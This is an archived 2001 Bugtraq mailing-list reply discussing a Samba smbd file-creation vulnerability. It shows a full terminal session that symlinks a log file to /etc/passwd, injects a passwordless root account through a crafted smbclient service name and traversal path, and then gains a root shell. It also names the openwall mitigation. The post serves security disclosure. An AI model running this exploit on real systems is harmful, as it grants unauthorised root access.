[21188] in bugtraq
Re: smbd remote file creation vulnerability
daemon@ATHENA.MIT.EDU (Pavol Luptak)
Mon Jun 25 18:26:39 2001
Date: Mon, 25 Jun 2001 19:09:19 +0200
From: Pavol Luptak <wilder@hq.alert.sk>
To: bugtraq@securityfocus.com
Message-ID: <20010625190919.A13420@hq.alert.sk>
Mail-Followup-To: Pavol Luptak <wilder@hq.alert.sk>,
bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="HlL+5n6rz5pIUxbD"
Content-Disposition: inline
In-Reply-To: <20010625001401.A2738@localhost.sk>; from maniac@localhost.sk on Mon, Jun 25, 2001 at 12:14:02AM +0200
--HlL+5n6rz5pIUxbD
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Mon, Jun 25, 2001 at 12:14:02AM +0200, maniac@localhost.sk wrote:
>=20
> Hi,
>=20
> Mandrake 7.1 (Mandrake 8.0 and RedHat6.2) defaultly logs here:
> /var/log/samba/log.%m
>=20
> I replaced it with /var/log/samba/%m.log and used your exploit, which
> worked - into /etc/passwd was appended also line:
> toor::0:0::/:/bin/sh
>=20
> But until there was that two spaces onto begining of line, it was
> impossible to su to that account, this is error message:
>=20
> Jun 24 23:28:55 localhost PAM_pwdb[23844]: check pass; user unknown
>=20
> I tried to insert \r after the first \n, but unsucessfully.=20
> I'm using pam-0.72-7mdk.
>=20
> This versions of PAM also don't permit spaces on begining of line:
> pam-0.72-20.6.x (Redhat6.2)
> pam-0.74-6mdk (Mandrake8.0(
>=20
> Maybe sshd without PAM support and permitting empty password may be
> 'vulnerable' on such systems.
[wilder@lysurus wilder]$ cat /etc/redhat-release=20
Linux Mandrake release 8.0 (Traktopel) for i586
[wilder@lysurus wilder]$ rpm -q pam
pam-0.74-6mdk
[wilder@lysurus wilder]$ egrep "log file" /etc/smb.conf
# this tells Samba to use a separate log file for each machine
log file =3D /var/log/samba/%m.log (=3D changed from default log.%m)
# Put a capping on the size of the log files (in Kb).
[wilder@lysurus wilder]$ rpm -qf /usr/sbin/smbd
samba-2.0.9-1.3mdk
[wilder@lysurus wilder]$ ln -s /etc/passwd /tmp/x.log
[wilder@lysurus wilder]$ smbclient //localhost/"`perl -e '{print "\ntoor::0=
:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N
added interface ip=3D10.0.0.43 bcast=3D10.0.0.255 nmask=3D255.255.255.0
Anonymous login successful
Domain=3D[UI42] OS=3D[Unix] Server=3D[Samba 2.0.9]
[wilder@lysurus wilder]$ tail /etc/passwd
=2E.
=2E.
[2001/06/25 18:46:48, 1] smbd/reply.c:reply_sesssetup_and_X(927)
Rejecting user 'wilder': authentication failed
[2001/06/25 18:46:48, 0] smbd/service.c:make_connection(213)
../../../tmp/x (127.0.0.1) couldn't find service=20
toor::0:0::/:/bin/sh
[wilder@lysurus wilder]$ su toor
[root@lysurus wilder]#
Appending to /etc/passwd has nothing to do with pam.
Mandrake security fix of samba-2.0.9-1.3mdk does not solve this security
problem. This exploit works with samba 2.0.8 without problems, too.
Linux kernels with openwall patch (with restricted links in /tmp) are
imunne to this type of attack (following symlinks does not work, link
owner does not match with file's owner).
Cheers,
Pavol
--=20
_______________________________________________________________________
[wilder@hq.alert.sk] [http://hq.alert.sk/~wilder] [talker: ttt.sk 5678]=20
--HlL+5n6rz5pIUxbD
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE7N3A/hL+8XxdK5TIRAqw0AKClDu7mLsRDd1WqP1xy5QsL2iMPUwCglNb8
C76JzoWb5djJrCG6h2atdfc=
=AyqG
-----END PGP SIGNATURE-----
--HlL+5n6rz5pIUxbD--
